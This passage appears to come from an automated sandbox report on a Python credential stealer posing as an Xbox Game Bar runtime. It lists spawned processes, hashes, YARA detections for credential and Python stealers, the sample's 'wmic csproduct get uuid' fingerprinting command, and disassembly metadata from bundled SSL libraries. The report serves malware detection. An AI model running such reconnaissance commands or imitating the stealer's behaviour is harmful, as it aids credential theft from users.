                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:04:46:32
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                                                                                                                                                                                                                                        Imagebase:0x7ff6f2460000
                                                                                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:04:46:36
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fe0c0000
                                                                                                                                                                                                                                        File size:24'189'952 bytes
                                                                                                                                                                                                                                        MD5 hash:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:04:46:38
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:04:46:39
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                        Imagebase:0x7ff65c050000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                                        Start time:04:46:39
                                                                                                                                                                                                                                        Start date:15/11/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff7bc2b0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true


                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:45
                                                                                                                                                                                                                                          Total number of Limit Nodes:5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Err_Module_Object$ItemString$Create2DeallocFormatLong_MallocMem_MemoryObject_OccurredSys_Voidmemcpy
                                                                                                                                                                                                                                          • String ID: .lib$1.15.1$cffi extension module '%s' uses an unknown version tag %p. This module might need a more recent version of cffi than the one currently installed, which is %s$ffi$lib$modules

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_LongLong_$Arg_Buffer_$ArgumentOccurredUnsigned$BufferContiguousE_scryptEval_Object_ReleaseStringThread$Bytes_FormatFromKeywordsRestoreSaveSizeUnpack
                                                                                                                                                                                                                                          • String ID: @$Invalid parameter combination for n, r, p, maxmem.$argument 'n'$argument 'p'$argument 'password'$argument 'r'$argument 'salt'$contiguous buffer$dklen must be greater than 0 and smaller than %d$int$maxmem must be positive and smaller than %d$n is required and must be an unsigned int$n must be a power of 2.$p is required and must be an unsigned int$password is too long.$r is required and must be an unsigned int$salt is required$salt is too long.$scrypt
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_sizeO_memcmpR_flagsX_cipherX_md
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Deadline_DeallocErr_Eval_O_ctrlThread$CheckInitL_do_handshakeL_get_rbioL_get_wbioObjectR_clear_errorR_peek_last_errorRestoreSaveSignalsStringWeakref_
                                                                                                                                                                                                                                          • String ID: Underlying socket connection gone$_ssl.c:985: The handshake operation timed out$_ssl.c:989: Underlying socket has been closed.$_ssl.c:993: Underlying socket too large for select().
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Cannot allocate write+execute memory for ffi.callback(). You might be running on a system that prevents this. For more information, see https://cffi.readthedocs.io/en/latest/using.html#callbacks, xrefs: 00007FF81E50BAFA
                                                                                                                                                                                                                                          • FFI_TRAMPOLINE_SIZE too small in c/libffi_x86_x64\ffi.c, xrefs: 00007FF81E50BC83
                                                                                                                                                                                                                                          • O!O|OO:callback, xrefs: 00007FF81E50B9A2
                                                                                                                                                                                                                                          • libffi failed to build this callback, xrefs: 00007FF81E50BCE1
                                                                                                                                                                                                                                          • %s: callback with unsupported argument or return type or with '...', xrefs: 00007FF81E50BB85
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$FormatObject_String$AllocArg_ErrorFatalInfoParseSizeSystemTrackTuple_Virtual
                                                                                                                                                                                                                                          • String ID: %s: callback with unsupported argument or return type or with '...'$Cannot allocate write+execute memory for ffi.callback(). You might be running on a system that prevents this. For more information, see https://cffi.readthedocs.io/en/latest/using.html#callbacks$FFI_TRAMPOLINE_SIZE too small in c/libffi_x86_x64\ffi.c$O!O|OO:callback$libffi failed to build this callback
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_iv_length
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_record_tls13.c$M
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_cleanse$O_free$D_lock_newO_mallocO_strdupO_strndupX509_chain_up_refX509_up_ref_time64memcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free$D_sizeDigestO_mallocP_sha256_time64
                                                                                                                                                                                                                                          • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$Y_free$L_cleanseO_free$N_bn2binN_num_bits
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c
                                                                                                                                                                                                                                          • API String ID: 407376196-1507966698
                                                                                                                                                                                                                                          • Opcode ID: bfe347ec57a691a3ff231926510988ec0a0bcc62f942f8fba7933f7892b3e20a
                                                                                                                                                                                                                                          • Instruction ID: f39a8792124ca5f864d746f0db44a0219bc103db64689e2b873ffb0a017fba23
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfe347ec57a691a3ff231926510988ec0a0bcc62f942f8fba7933f7892b3e20a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48B15972A08E8281FE649A12D594BBA6691FF85BE4F084235EE4D4BB95DF3CF542C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$memcpy$L_cleanseO_mallocmemset
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2649524955-4238427508
                                                                                                                                                                                                                                          • Opcode ID: c8176c414889550db18000435abb5a1deba6356550613b413f080dcc09cb8534
                                                                                                                                                                                                                                          • Instruction ID: 8d0ab7ec818807d9cafe6d7136b0b4c017fd73a25763beb6f7886317452cc0bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8176c414889550db18000435abb5a1deba6356550613b413f080dcc09cb8534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24519C72709B8692EE548F16E440AAAB7A0FB84BD4F044232EE8D47765CF3CE562C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_mem_ctrl$L_sk_newL_sk_pushL_sk_sortO_mallocP_get_nameP_get_typeP_zlib
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_ciph.c
                                                                                                                                                                                                                                          • API String ID: 680475741-1847046956
                                                                                                                                                                                                                                          • Opcode ID: 62ee42c7a7c76134d40cdec2259d5c75cc418fa19301ec1af2a8b91bded5920c
                                                                                                                                                                                                                                          • Instruction ID: 0d6859ff570aea8e76b6fd75f6b006633ea7ae2c51d586e93035e9d10b0eb724
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62ee42c7a7c76134d40cdec2259d5c75cc418fa19301ec1af2a8b91bded5920c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84111560E08E0681FE48AB62E8197B86395BF947E5F440235FA0D07BD3EE6CFC428201
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • BN_bin2bn.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D03D7
                                                                                                                                                                                                                                          • BN_bin2bn.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D03EB
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05A8
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05B0
                                                                                                                                                                                                                                          • BN_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05B8
                                                                                                                                                                                                                                          • DH_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05C0
                                                                                                                                                                                                                                          • EVP_PKEY_free.LIBCRYPTO-1_1(?,?,00000000,00000000,?,..\s\ssl\statem\statem_clnt.c,00007FF81E0CE15A), ref: 00007FF81E0D05C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: N_free$N_bin2bn$H_freeY_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c
                                                                                                                                                                                                                                          • API String ID: 2982095754-1507966698
                                                                                                                                                                                                                                          • Opcode ID: 2a12ea7c95104e32635f3a9105b02c5bb099e863f7de12298ca0f2c235696508
                                                                                                                                                                                                                                          • Instruction ID: 2773057a7b9829caf99ea5e3c1c6ebe0ac8f1c49c1017e6e6a450c39109fb1d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a12ea7c95104e32635f3a9105b02c5bb099e863f7de12298ca0f2c235696508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2791D862A08BC146EB60DB25A5107BB6791FB857D4F449231EECD17B86DF3CF9918B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_derive$O_clear_freeO_mallocX_freeX_newY_derive_initY_derive_set_peer
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_unlockD_write_lockH_deleteH_retrieveO_clear_flagsO_freeO_set_flagsO_snprintfR_add_error_datamemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_d1.c$SSL alert number
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_zalloc$J_nid2snP_get_digestbyname
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_flagsO_set_dataO_set_initO_zallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\bio_ssl.c$=
                                                                                                                                                                                                                                          • API String ID: 3341103989-3341019427
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D24DA
                                                                                                                                                                                                                                          • EVP_MD_CTX_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D24E3
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D24F8
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D250E
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D2523
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E0D1BE0: CRYPTO_malloc.LIBCRYPTO-1_1(?,00007FF81E0D0F48), ref: 00007FF81E0D1C1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E0D1BE0: ERR_put_error.LIBCRYPTO-1_1(?,00007FF81E0D0F48), ref: 00007FF81E0D1C43
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1(?,00000000,?,?,?,00007FF81E0D202D), ref: 00007FF81E0D26BD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free$X_free$O_mallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_dtls.c
                                                                                                                                                                                                                                          • API String ID: 4216106018-3140652063
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
